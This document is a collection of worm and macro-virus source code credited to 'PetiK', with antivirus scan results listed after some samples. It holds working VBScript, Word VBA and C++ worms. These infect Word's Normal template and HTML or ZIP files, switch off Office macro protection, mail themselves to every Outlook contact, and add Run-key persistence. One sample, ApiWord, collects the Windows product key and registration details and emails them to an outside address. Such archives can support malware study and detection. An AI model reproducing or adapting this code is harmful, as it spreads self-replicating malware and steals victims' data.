'VBS.Xchange.B aka RasLFront On Error Resume Next Set fso=CreateObject("Scripting.FileSystemObject") Set ws=CreateObject("WScript.Shell") Set fl=fso.OpenTextFile(WScript.ScriptFullname,1) virus=fl.ReadAll fl.Close Set win=fso.GetSpecialFolder(0) fcopy=win&"\XchgFix.vbs" reg="HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" 'fso.GetFile(WScript.ScriptFullName).Copy(fcopy) 'ws.RegWrite reg&"\MsExchangeFix",fcopy set sp=fso.CreateTextFile("C:\rlf.sys",True,8) sp.WriteLine "Private Sub Document_Open()" sp.WriteLine "On Error Resume Next" sp.WriteLine "e = """"" For i=1 To len(virus) e=Mid(virus,i,1) e=Hex(Asc(e)) If Len(e)=1 Then e="0"&e End If f=f+e If Len(f)=110 Then sp.WriteLine "e = e + """+f+"""" f="" End If If Len(virus)-i = 0 Then sp.WriteLine "e = e + """+f+"""" f="" End If Next sp.WriteLine "Call infect_fichier" sp.WriteLine "End Sub" sp.WriteLine "" sp.WriteLine "Sub HelpAbout()" sp.WriteLine "On Error Resume Next" sp.WriteLine "MsgBox ""This is my very first VBS-W97M Worm"", vbInformation, ""IWorm.Xchange""" sp.WriteLine "End Sub" sp.WriteLine "" sp.WriteLine "Sub AutoClose()" sp.WriteLine "On Error Resume Next" sp.WriteLine "FileSystem.Kill ""C:\xfix.vbs""" sp.WriteLine "End Sub" sp.WriteLine "" sp.WriteLine "Sub infect_fichier()" sp.WriteLine "On Error Resume Next" sp.WriteLine "Set nor = NormalTemplate.VBProject.VBComponents(1)" sp.WriteLine "Set doc = ActiveDocument.VBProject.VBComponents(1)" sp.WriteLine "df = ""C:\rlf.sys""" sp.WriteLine "If nor.Name <> ""raslfront"" Then" sp.WriteLine "nor.Name = ""raslfront""" sp.WriteLine "read=dec(e)" sp.WriteLine "Open ""C:\xfix.vbs"" For Output As #1" sp.WriteLine "Print #1, read" sp.WriteLine "Close #1" sp.WriteLine "Shell ""wscript C:\xfix.vbs""" sp.WriteLine "End If" sp.WriteLine "" sp.WriteLine "Function dec(octe)" sp.WriteLine "For hexad = 1 To Len(octe) Step 2" sp.WriteLine "dec = dec & Chr(""&h"" & Mid(octe, hexad, 2))"

sp.WriteLine "Next" sp.WriteLine "End Function" sp.Close Set wrd=CreateObject("Word.Application") wrd.Options.virusprotection=0 wrd.Options.savenormalprompt=0 wrd.Options.confirmconversion=0 If wrd.normaltemplate.vbproject.vbcomponents(1).name <> "raslfront" Then wrd.normaltemplate.vbproject.vbcomponents(1).codemodule.addfromFile("C:\rlf.sys") wrd.normaltemplate.vbproject.vbcomponents(1).name="raslfront" MsgBox "Pas Encore" End If wrd.Application.Quit WScript.Quit

<welcome> <html><head><title>Welcome</title> <body onLoad="window.status='Welcome to my last creation'"> <SCRIPT Language=VBScript> On Error Resume Next msgbox "Please accept the ActiveX",vbinformation,"MSIE Warning !" Set fso=CreateObject("Scripting.FileSystemObject") Set ws=CreateObject("WScript.Shell") If err.number=429 then ws.Run javascript:location.reload() Else vbsn="" For vbsname=1 To 8 randomize(timer) vbsn=vbsn & chr(int(rnd(1)*26)+65) Next vbsn=vbsn&".vbs" htms=document.body.createTextRange.htmltext Set vbsf=fso.CreateTextFile("C:\"&vbsn,2,True) vbsf.WriteLine "Set fs=CreateObject(""Scripting.FileSystemObject"")" vbsf.WriteLine "Set ws=CreateObject(""WScript.Shell"")" vbsf.Write "htm=""" For i=1 To Len(htms) e=Mid(htms,i,1) e=Hex(Asc(e)) If Len(e)=1 Then e="0"&e End If vbsf.Write e Next vbsf.Write """" vbsf.WriteLine "" vbsf.WriteLine "Set newhtm=fs.CreateTextFile(""C:\Welcome2U.htm"",True,2)" vbsf.WriteLine "newhtm.WriteLine ""<welcome>""" vbsf.WriteLine "newhtm.WriteLine ""<html><head><title>Welcome</title>""" vbsf.WriteLine "newhtm.WriteLine ""<body onLoad=""""window.status='Welcome to my last creation'"""">""" vbsf.WriteLine "read=""""" vbsf.WriteLine "For pos=1 To Len(htm) Step 2" vbsf.WriteLine "read=read " &Chr(38)& " Chr(""" &Chr(38)& "h"""&Chr(38)& " Mid(htm,pos,2))" vbsf.WriteLine "Next" vbsf.WriteLine "newhtm.Write read" vbsf.WriteLine "newhtm.WriteLine ""</body></html>""" vbsf.WriteLine "newhtm.Close" vbsf.WriteLine "ws.Run ""C:\Welcome2U.htm""" vbsf.Close Set win=fso.GetSpecialFolder(0) Set sys=fso.GetSpecialFolder(1) Set out=CreateObject("Outlook.Application") Set map=out.GetNameSpace("MAPI") For Each adr In map.AddressLists If adr.AddressEntries <> 0 Then For addr=1 To adr.Addressentries.Count Set nadr=adr.AddressEntries(addr) Set mel=out.CreateItem(0) mel.To=nadr.Address mel.Subject="A Gift from your best friend" mel.Body="This is for you (" &left(vbsn,8)& ")." mel.Attachments.Add("C:\"&vbsn) mel.Send Next End If Next infect(win) infect(sys) infect(fso.GetSpecialFolder(1)) infect(ws.SpecialFolders("MyDocuments")) infect(ws.SpecialFolders("Desktop")) infect(ws.SpecialFolders("Favorites"))

infect(ws.SpecialFolders("Recent")) If Day(Now())=7 Then document.write "<font face='Lucida Console' size='2' color=black>Welcome to my last creation : HTML.Welcome.A<br>Coded by PetiK/[rRlf]<br></font>" Else document.write "<font face='Lucida Console' size='3' color=black>Welcome To You !<br>Have a nice day.<br></font>" End If End If Function infect(doss) Set FolderObj = FSO.GetFolder(doss) Set FO = FolderObj.Files For each cible in FO ext = lcase(FSO.GetExtensionName(cible.Name)) if ext="htm" or ext="html" or ext="htz" or ext="hta" or ext="asp" Then Set good = fso.OpenTextFile(cible.path, 1, False) if good.readline <> "<welcome>" Then good.close() Set good = fso.OpenTextFile(cible.path, 1, False) htmorg = good.ReadAll() good.close() Set virus = document.body.createTextRange Set good = fso.CreateTextFile(cible.path, True, False) good.WriteLine "<welcome>" good.Write(htmorg) good.WriteLine virus.htmltext good.Close() else good.close() end if end if next End Function </script> </body></html> YVQAVQXD.vbs Set fs=CreateObject("Scripting.FileSystemObject") Set ws=CreateObject("WScript.Shell") htm="0D0A3C534352495054206C61...6E67756167543E" Set newhtm=fs.CreateTextFile("C:\Welcome2U.htm",True,2) newhtm.WriteLine "<welcome>" newhtm.WriteLine "<html><head><title>Welcome</title>" newhtm.WriteLine "<body onLoad=""window.status='Welcome to my last creation'"">" read="" For pos=1 To Len(htm) Step 2 read=read & Chr("&h"& Mid(htm,pos,2)) Next newhtm.Write read newhtm.WriteLine "</body></html>" newhtm.Close ws.Run "C:\Welcome2U.htm"

File Welcome.htm received on 05.16.2009 19:58:08 (CET) Antivirus a-squared AhnLab-V3 AntiVir Antiy-AVL Authentium Avast AVG BitDefender CAT-QuickHeal ClamAV Comodo DrWeb eSafe eTrust-Vet F-Prot F-Secure Fortinet GData Ikarus K7AntiVirus Kaspersky McAfee McAfee+Artemis McAfee-GW-Edition Microsoft NOD32 Norman nProtect Panda PCTools Prevx Rising Sophos Sunbelt Symantec TheHacker TrendMicro VBA32 ViRobot VirusBuster Version 4.0.0.101 5.0.0.2 7.9.0.168 2.0.3.1 5.1.2.4 4.8.1335.0 8.5.0.336 7.2 10.00 0.94.1 1157 5.0.0.12182 7.0.17.0 31.6.6508 4.4.4.56 8.0.14470.0 3.117.0.0 19 T3.1.1.49.0 7.10.737 7.0.0.125 5616 5616 6.7.6 1.4602 4080 6.01.05 2009.1.8.0 10.0.0.14 4.4.2.0 3.0 21.29.52.00 4.41.0 3.2.1858.2 1.4.4.12 6.3.4.1.326 8.950.0.1092 3.12.10.5 2009.5.15.1737 4.6.5.0 Last Update 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.08 2009.05.16 2009.05.14 2009.05.16 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 Result Virus.VBS.Petik!IK HTML/Htz VBS/Petik.1 Virus/VBS.VBS VBS/Chu.C@mm VBS:Malware-gen VBS/Nuel Generic.ScriptWorm.7F8BE6E9 VBS/Chu.C Worm.VBS.Petik Unclassified Malware VBS.Generic.16 VBS.TVKid. VBS/Nuel.B VBS/Chu.C@mm Virus.VBS.Petik VBS/Htz@mm Generic.ScriptWorm.7F8BE6E9 Virus.VBS.Petik Virus.VBS.Petik VBS/Nuel@MM VBS/Nuel@MM Script.Petik.1 Virus:VBS/Petik.gen probably unknown SCRIPT VBS/Petik.P VBS.Petik.J@mm VBS/Petik.L VBS.Acroph.A Script.VBS.Petik VBS/Petik-W VBS.Manu@mm VBS_PETIK.G Virus.VBS.Petik VBS.Worm-Family VBS.Acroph.A

Additional information File size: 3349 bytes MD5...: 8b66aadcff8510521ba7f0bacb6fc54a SHA1..: e1022a03f29f2ffd74764d6e4547b691c16991bc

' ' ' '

Name : W97M.AutoSpread Author : PetiK Language : VBA Word Date : 09/05/2002

Attribute VB_Name = "AutoSpread" Private Declare Function Sleep& Lib "kernel32" (ByVal dwReserved As Long) Sub AutoOpen() nam = ActiveDocument.Name vnam = Left(nam, Len(nam) - 4) Call FuckProtection Call InfectWord Call Spread If Day(Now) = 8 Then MsgBox "This Document is infected by W97M." + vnam, vbCritical, "W97M." + vnam + ".A" End If End Sub Sub InfectWord() On Error Resume Next Set nor = NormalTemplate.VBProject.VBComponents Set doc = ActiveDocument.VBProject.VBComponents srcmod = "C:\kitep.drv" If nor.Item("AutoSpread").Name <> "AutoSpread" Then doc("AutoSpread").Export srcmod nor.Import srcmod End If If doc.Item("AutoSpread").Name <> "AutoSpread" Then nor("AutoSpread").Export srcmod doc.Import srcmod ActiveDocument.Save End If Kill (srcmod) End Sub Sub FuckProtection() With Options .ConfirmConversions = False .VirusProtection = False .SaveNormalPrompt = False End With Select Case Application.Version Case "10.0" System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "Level") = 1& System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "AccessVBOM") = 1& Case "9.0" System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1& End Select WordBasic.DisableAutoMacros 0 End Sub Sub Spread() On Error Resume Next subj = Left(ActiveDocument.Name, Len(ActiveDocument.Name) - 4) att = ActiveDocument.FullName win = Environ("windir") FileSystem.MkDir win + "\AutoSpread" x = 0 nfile = "" Do While x < 8 Randomize (Timer) nfile = nfile + Chr(Int(Rnd(1) * 8) + 48) x = x + 1 Loop reg = nfile nfile = nfile + ".vbs" nfile = win + "\AutoSpread\" + nfile Open nfile For Output As #1 Print #1, "'From W97M.AutoSpread" Print #1, "On Error Resume Next"

Print #1, "Set out=CreateObject(""Outlook.Application"")" Print #1, "Set map=out.GetNameSpace(""MAPI"")" Print #1, "For Each C in map.AddressLists" Print #1, "If C.AddressEntries.Count <> 0 Then" Print #1, "For D=1 To C.AddressEntries.Count" Print #1, "Set E=C.AddressEntries(D)" Print #1, "Set env=out.CreateItem(0)" Print #1, "env.To=E.Address" Print #1, "env.Subject=""" + subj + """" Print #1, "env.Body=""This confidential document is for you.""" Print #1, "env.Attachments.Add(""" + att + """)" Print #1, "env.DeleteAfterSubmit=True" Print #1, "If env.To <> """" Then" Print #1, "env.Send" Print #1, "End If" Print #1, "Next" Print #1, "End If" Print #1, "Next" Print #1, "WScript.Quit" System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", reg) = nfile End Sub Sub HelpAbout() With Application.Assistant .Visible = True End With With Assistant.NewBalloon .Text = "W97M.AutoSpread.A coded by PetiK (c)2002" .Heading = "W97M.AutoSpread" .Animation = msoAnimationGetAttentionMajor .Button = msoButtonSetOK .Show End With slp = Sleep(5000) For nb = 1 To Int(Rnd(1) * 10) + 1 Selection.TypeText "Hi guy, You're infected by my virus. It's not dangerous. " Selection.TypeText "Refer to AntiVirus site to disinfect your computer. " Selection.TypeText "No dangerous payload, large spread, it's coded by PetiK. " Next nb End Sub 76406570.vbs 'From W97M.AutoSpread On Error Resume Next Set out=CreateObject("Outlook.application") Set map=out.GetNameSpace("MAPI") For Each C in map.AddressLists If C.AddressEntries.Count <> 0 Then For D=1 To C.AddressEntries.Count Set E=C.AddressEntries(D) Set env=out.CreateItem(0) env.To=E.Address env.Subject="HelloWorld" env.Body="This confidential document is for you." env.Attachments.Add("C:\PetiK\W32.HLLW.RLF\HelloWorld.doc") env.DeleteAfterSubmit=True If env.To <> "" Then env.Send End If Next End If Next WScript.Quit

File AutoSpread.doc received on 05.16.2009 10:45:28 (CET) Antivirus a-squared AhnLab-V3 AntiVir Antiy-AVL Authentium Avast AVG BitDefender CAT-QuickHeal ClamAV Comodo DrWeb eSafe eTrust-Vet F-Prot F-Secure Fortinet GData Ikarus K7AntiVirus Kaspersky McAfee McAfee+Artemis McAfee-GW-Edition Microsoft NOD32 Norman nProtect Panda PCTools Prevx Rising Sophos Sunbelt Symantec TheHacker TrendMicro VBA32 ViRobot VirusBuster Version 4.0.0.101 5.0.0.2 7.9.0.168 2.0.3.1 5.1.2.4 4.8.1335.0 8.5.0.336 7.2 10.00 0.94.1 1157 5.0.0.12182 7.0.17.0 31.6.6508 4.4.4.56 8.0.14470.0 3.117.0.0 19 T3.1.1.49.0 7.10.735 7.0.0.125 5616 5616 6.7.6 1.4602 4080 6.01.05 2009.1.8.0 10.0.0.14 4.4.2.0 3.0 21.29.51.00 4.41.0 3.2.1858.2 1.4.4.12 6.3.4.1.326 8.950.0.1092 3.12.10.5 2009.5.15.1737 4.6.5.0 Last Update 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15 2009.05.08 2009.05.16 2009.05.14 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.14 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15 Result Email-Worm.Win32.Petik!IK W97M/Apish.B W2000M/Droopy.A W97M/Beko.B@mm MW97:Beko family W97M/Beko W97M.Petik.A@mm W97M.ZMK.M WM.Pivis Worm.Win32.Email-Worm.Petik W97M.Petik Win32.Petik W97M/Beko.B:mm W97M/Beko.B@mm Email-Worm.Win32.Petik W97M/Petik.B W97M.Petik.A@mm Email-Worm.Win32.Petik Macro.Beko Email-Worm.Win32.Petik W97M/Generic@MM W97M/Generic@MM Macro.Droopy.A Virus:W97M/Aspread.A@mm W97M/Beko.B W97M/Beko.B W97M.Petik.A@mm W97M/CokeBoy WORD.97.Petaspr.A Worm.Mail.Agent.ac WM97/Spread-A W97M.Beko@mm W2KM/Generico W97M_BEKO.B Email-Worm.Win32.Petik W97M.Beko.B WORD.97.Petaspr.A

Additional information File size: 40960 bytes MD5...: b7f7ed86d457fec2493db21e8886b981 SHA1..: 5f1c2e11b84ac3df1e06f9dc290c3706735b8065

/* Name : I-Worm.Archiver Author : PetiK Date : Mai 10th 2002 Language : C++ Comments : Infect ZIP files which run with WINZIP. We can also to do the same think with PowerArchiver: powerarc -a -c4 archive.zip virus.exe */ #include <windows.h> #include <stdio.h> #include <mapi.h> #pragma argused #pragma inline char char char filen[100],copyn[100],copyreg[100],windir[100],sysdir[100],inzip[256],fsubj[50]; *fnam[]={"news","support","info","newsletter","webmaster"};

*fmel[]={"@yahoo.com","@hotmail.com","@symantec.com","@microsoft.com","@avp.ch","@virusli st.com"}; LPSTR run="Software\\Microsoft\\Windows\\CurrentVersion\\Run", SHFolder=".DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders"; char attname[]="news_xxxxxxxx.exe"; LPTSTR cmdLine,ptr; BOOL installed; BYTE desktop[50],favoris[50],personal[50],winzip[50]; DWORD sizdesktop=sizeof(desktop),sizfavoris=sizeof(favoris), sizpersonal=sizeof(personal),sizwinzip=sizeof(winzip); DWORD type=REG_SZ; long i; LHANDLE session; MapiMessage *mes; MapiRecipDesc from; char messId[512],mname[50],maddr[30]; HINSTANCE hMAPI; HKEY hReg; WIN32_FIND_DATA ffile; void infzip(char *); ULONG ULONG ULONG ULONG ULONG ULONG (PASCAL (PASCAL (PASCAL (PASCAL (PASCAL (PASCAL FAR FAR FAR FAR FAR FAR *mSendMail)(ULONG, ULONG, MapiMessage*, FLAGS, ULONG); *mLogoff)(LHANDLE, ULONG, FLAGS, ULONG); *mLogon)(ULONG, LPTSTR, LPTSTR, FLAGS, ULONG, LPLHANDLE); *mFindNext)(LHANDLE, ULONG, LPTSTR, LPTSTR, FLAGS, ULONG, LPTSTR); *mReadMail)(LHANDLE, ULONG, LPTSTR, FLAGS, ULONG, lpMapiMessage FAR *); *mFreeBuffer)(LPVOID);

int WINAPI WinMain (HINSTANCE hInst, HINSTANCE hPrev, LPSTR lpCmd, int nShow) { GetModuleFileName(hInst,filen,100); GetSystemDirectory((char *)sysdir,100); GetWindowsDirectory((char *)copyn,100); strcpy(windir,copyn); strcat(copyn,"\\Archiver.exe"); installed=FALSE; cmdLine=GetCommandLine(); if(cmdLine) { for(ptr=cmdLine;ptr[0]!='-' && ptr[1]!=0;ptr++); if(ptr[0]=='-' && ptr[1]!=0) { switch(ptr[1]) { default: break; case 'i': installed=TRUE; break; case 'p': ShellAbout(0,"I-Worm.Archiver","Copyright (c)2002 - PetiKVX",0); MessageBox(NULL,"This new Worm was coded by PetiK.\nFrance -

(c)2002", "I-Worm.Archiver",MB_OK|MB_ICONINFORMATION); ExitProcess(0); break; } } } if(!installed) { CopyFile(filen,copyn,FALSE); strcpy(copyreg,copyn); strcat(copyreg," -i"); /* RegOpenKeyEx(HKEY_LOCAL_MACHINE,run,0,KEY_WRITE,&hReg); RegSetValueEx(hReg,"Archiver",0,REG_SZ,(BYTE *)copyreg,100); RegCloseKey(hReg); */ ExitProcess(0); } RegOpenKeyEx(HKEY_USERS,SHFolder,0,KEY_QUERY_VALUE,&hReg); RegQueryValueEx(hReg,"Desktop",0,&type,desktop,&sizdesktop); RegQueryValueEx(hReg,"Favorites",0,&type,favoris,&sizfavoris); RegQueryValueEx(hReg,"Personal",0,&type,personal,&sizpersonal); RegCloseKey(hReg); RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\windows\\CurrentVersion\\App Paths\\winzip32.exe",0,KEY_QUERY_VALUE,&hReg); RegQueryValueEx(hReg,NULL,0,&type,winzip,&sizwinzip); RegCloseKey(hReg); if(strlen(winzip)!=0) { infzip(windir); infzip(sysdir); infzip(desktop); infzip(personal); infzip(favoris); infzip("C:\\"); } /* _asm { call @wininet db "WININET.DLL",0 @wininet: call LoadLibrary test eax,eax jz end_asm mov ebp,eax call @inetconnect db "InternetGetConnectedState",0 @inetconnect: push ebp call GetProcAddress test eax,eax jz end_wininet mov edi,eax verf: push 0 push Tmp call edi dec eax jnz verf end_wininet: push ebp call FreeLibrary end_asm: jmp end_all_asm Tmp dd 0

end_all_asm: } hMAPI=LoadLibrary("MAPI32.DLL"); (FARPROC &)mSendMail=GetProcAddress(hMAPI, "MAPISendMail"); (FARPROC &)mLogon=GetProcAddress(hMAPI, "MAPILogon"); (FARPROC &)mLogoff=GetProcAddress(hMAPI, "MAPILogoff"); (FARPROC &)mFindNext=GetProcAddress(hMAPI, "MAPIFindNext"); (FARPROC &)mReadMail=GetProcAddress(hMAPI, "MAPIReadMail");

(FARPROC &)mFreeBuffer=GetProcAddress(hMAPI, "MAPIFreeBuffer"); mLogon(NULL,NULL,NULL,MAPI_NEW_SESSION,NULL,&session); if(mFindNext(session,0,NULL,NULL,MAPI_LONG_MSGID,NULL,messId)==SUCCESS_SUCCESS) { do { if(mReadMail(session,NULL,messId,MAPI_ENVELOPE_ONLY| MAPI_PEEK,NULL,&mes)==SUCCESS_SUCCESS) { strcpy(mname,mes->lpOriginator->lpszName); strcpy(maddr,mes->lpOriginator->lpszAddress); for(i=0;i<8;i++) attname[i+5]='1'+(char)(9*rand()/RAND_MAX); fsubj[0]=0; wsprintf(fsubj,"News from %s%s",fnam[GetTickCount()%4],fmel[GetTickCount()%5]); mes->ulReserved=0; mes->lpszSubject=fsubj; mes->lpszNoteText="This is some news send by our firm about security.\n" "Please read by clicking on attached file.\n" "\tBest Regards"; mes->lpszMessageType=NULL; mes->lpszDateReceived=NULL; mes->lpszConversationID=NULL; mes->flFlags=MAPI_SENT; mes->lpOriginator->ulReserved=0; mes->lpOriginator->ulRecipClass=MAPI_ORIG; mes->lpOriginator->lpszName=mes->lpRecips->lpszName; mes->lpOriginator->lpszAddress=mes->lpRecips->lpszAddress; mes->nRecipCount=1; mes->lpRecips->ulReserved=0; mes->lpRecips->ulRecipClass=MAPI_TO; mes->lpRecips->lpszName=mname; mes->lpRecips->lpszAddress=maddr; mes->nFileCount=1; mes->lpFiles=(MapiFileDesc *)malloc(sizeof(MapiFileDesc)); memset(mes->lpFiles, 0, sizeof(MapiFileDesc)); mes->lpFiles->ulReserved=0; mes->lpFiles->flFlags=NULL; mes->lpFiles->nPosition=-1; mes->lpFiles->lpszPathName=filen; mes->lpFiles->lpszFileName=attname; mes->lpFiles->lpFileType=NULL; mSendMail(session, NULL, mes, NULL, NULL); } }while(mFindNext(session,0,NULL,messId,MAPI_LONG_MSGID,NULL,messId)==SUCCESS_SUCCESS); free(mes->lpFiles); mFreeBuffer(mes); mLogoff(session,0,0,0); FreeLibrary(hMAPI); } */ ExitProcess(0); } void infzip(char *folder) { register bool abc=TRUE; register HANDLE fh; if(strlen(folder)!=0) { SetCurrentDirectory(folder); fh=FindFirstFile("*.zip",&ffile); if(fh!=INVALID_HANDLE_VALUE) { while(abc) { inzip[0]=0; wsprintf(inzip,"%s -a -r %s %s",winzip,ffile.cFileName,copyn); WinExec(inzip,1); abc=FindNextFile(fh,&ffile); } } } }

File Archiver.exe received on 05.16.2009 10:45:20 (CET) Antivirus a-squared AhnLab-V3 AntiVir Antiy-AVL Authentium Avast AVG BitDefender CAT-QuickHeal ClamAV Comodo DrWeb eSafe eTrust-Vet F-Prot F-Secure Fortinet GData Ikarus K7AntiVirus Kaspersky McAfee McAfee+Artemis McAfee-GW-Edition Microsoft NOD32 Norman nProtect Panda PCTools Prevx Rising Sophos Sunbelt Symantec TheHacker TrendMicro VBA32 ViRobot VirusBuster Version 4.0.0.101 5.0.0.2 7.9.0.168 2.0.3.1 5.1.2.4 4.8.1335.0 8.5.0.336 7.2 10.00 0.94.1 1157 5.0.0.12182 7.0.17.0 31.6.6508 4.4.4.56 8.0.14470.0 3.117.0.0 19 T3.1.1.49.0 7.10.735 7.0.0.125 5616 5616 6.7.6 1.4602 4080 6.01.05 2009.1.8.0 10.0.0.14 4.4.2.0 3.0 21.29.51.00 4.41.0 3.2.1858.2 1.4.4.12 6.3.4.1.326 8.950.0.1092 3.12.10.5 2009.5.15.1737 4.6.5.0 Last Update 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15 2009.05.08 2009.05.16 2009.05.14 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.14 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15 Result Email-Worm.Win32.Petik!IK Win32/Petik.worm.23048 Worm/Petik-1 Worm/Win32.Win32 W32/Malware!185a Win32:Trojan-gen {Other} I-Worm/Petik Win32.Petik.J@mm I-Worm.Petik Worm.Archer Worm.Win32.Petik.Archer Win32.HLLM.Petik.49152 Win32.Petik.b Win32/Petik.23040 W32/Malware!185a Email-Worm.Win32.Petik W32/Petik!worm Win32.Petik.J@mm Email-Worm.Win32.Petik Email-Worm.Win32.Petik Email-Worm.Win32.Petik W32/Stopin.d@MM W32/Stopin.d@MM Worm.Petik-1 Worm:Win32/Petick Win32/Petik.Archer W32/Petik.AM Worm/W32.Petik.23040 Worm Generic HLLW.Petarch.A High Risk Worm Worm.Archivera W32/Archiver-A Email-Worm.Win32.Petik W95.Pet_Tick.gen W32/Petik WORM_PETIK.C Win32.HLLW.Archiver HLLW.Petarch.A

Additional information File size: 23040 bytes MD5...: 6079048134255a415e569a57402d7c56 SHA1..: 35867a4491825a6c2557e6103cb6164705d6328d SHA256: f88aec37d60795ac97b73574b674bbf40bd8466dac54a33b1e1a8c0df8035391 PEiD..: UPX 2.90 [LZMA] -&gt; Markus Oberhumer, Laszlo Molnar &amp; John Reiser

' ' ' '

Name : W97M.ApiWord Author : PetiK Language : VBA Word Date : 14/05/2002

VB_Name = "ApiWord" Private Declare Function Sleep& Lib "kernel32" (ByVal dwReserved As Long) Private Declare Function CopyFile& Lib "kernel32" Alias "CopyFileA" (ByVal lpExistingFileName As String, ByVal lpNewFileName As String, ByVal bFailIfExists As Boolean) Private Declare Function CreateDirectory& Lib "kernel32" Alias "CreateDirectoryA" (ByVal lpszCrDir As String, ByVal secu As Long) Private Declare Function ExitWindowsEx& Lib "user32" (ByVal uFlags As Long, ByVal dwReserved As Long) Private Declare Function ShowCursor& Lib "user32" (ByVal fshow As Boolean) Private Declare Function SwapMouseButton& Lib "user32" (ByVal bSwap As Long) Private Declare Function WritePrivateProfileString& Lib "kernel32" Alias "WritePrivateProfileStringA" _ (ByVal lpszSection As String, ByVal lpszKey As String, _ ByVal lpszString As String, ByVal lpszFile As String) Sub AutoOpen() slp = Sleep(1000) winp = Environ("windir") crd = CreateDirectory(winp + "\ApiSystem", 0) cp = CopyFile(ActiveDocument.FullName, winp + "\ApiSystem\HelloU.doc", False) Call Call Call Call endprotect infdoc SrchF PayLoad

End Sub Sub HelpAbout() MsgBox "System must be shutdown.", vbCritical, "Warning" ext = ExitWindowsEx(2, 0) End Sub Sub SrchF() On Error Resume Next winp = Environ("windir") infile = winp + "\ApiSystem\AboutU.ini" MS = "HKEY_LOCAL_MACHINE\Software\Microsoft\ApiWord" If System.PrivateProfileString("", MS, "Send Info") <> "OK" Then CV = "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion" nom = System.PrivateProfileString("", CV, "RegisteredOwner") ent = System.PrivateProfileString("", CV, "RegisteredOrganization") ver = System.PrivateProfileString("", CV, "Version") vern = System.PrivateProfileString("", CV, "VersionNumber") pi = System.PrivateProfileString("", CV, "ProductId") pk = System.PrivateProfileString("", CV, "ProductKey") pf = System.PrivateProfileString("", CV, "ProgramFilesDir") sp = System.PrivateProfileString("", _ "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main", "Start Page") wr wr wr wr wr wr wr wr = = = = = = = = WritePrivateProfileString("Information", WritePrivateProfileString("Information", WritePrivateProfileString("Information", WritePrivateProfileString("Information", WritePrivateProfileString("Information", WritePrivateProfileString("Information", WritePrivateProfileString("Information", WritePrivateProfileString("Information", "Name", nom, infile) "Organization", ent, infile) "Version of Windows", ver, infile) "Number of Version", vern, infile) "Identification Number", pi, infile) "Key Number", pk, infile) "Program Files Path", pf, infile) "Start Page", sp, infile)

Set out = CreateObject("Outlook.Application") Set map = out.GetNameSpace("MAPI") map.Logon "profile", "password" mel = out.CreateItem(0) mel.To = "apiinfo@lycos.fr" mel.Subject = "Mail from " + nom mel.Attachments.Add (infile) mel.DeleteafterSubmit = True mel.Send map.Logoff

System.PrivateProfileString("", System.PrivateProfileString("", System.PrivateProfileString("", System.PrivateProfileString("", System.PrivateProfileString("", End If End Sub

MS, MS, MS, MS, MS,

"Author") = "PetiK" "Info File") = infile "Name") = "W97M.ApiWord" "Version") = "A" "Send Info") = "OK"

Sub infdoc() On Error Resume Next winp = Environ("windir") Set Nor = NormalTemplate.VBProject.VBComponents Set Doc = ActiveDocument.VBProject.VBComponents DropFile = winp + "\ApiSystem\src.txt" If Nor.Item("ApiWord").Name <> "ApiWord" Then Doc("ApiWord").Export DropFile Nor.Import DropFile End If If Doc.Item("ApiWord").Name <> "ApiWord" Then Nor("ApiWord").Export DropFile Doc.Import DropFile ActiveDocument.Save End If End Sub Sub endprotect() With Options .ConfirmConversions = False .VirusProtection = False .SaveNormalPrompt = False End With Select Case Application.Version Case "10.0" System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "Level") = 1& System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "AccessVBOM") = 1& Case "9.0" System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1& End Select WordBasic.DisableAutoMacros 0 End Sub Sub PayLoad() num = Int((Rnd * 10) + 1) If num = 1 Then sm = SwapMouseButton(&H2) ElseIf num = 5 Then sc = ShowCursor(False) slp = Sleep(10000) sc = ShowCursor(True) End If End Sub

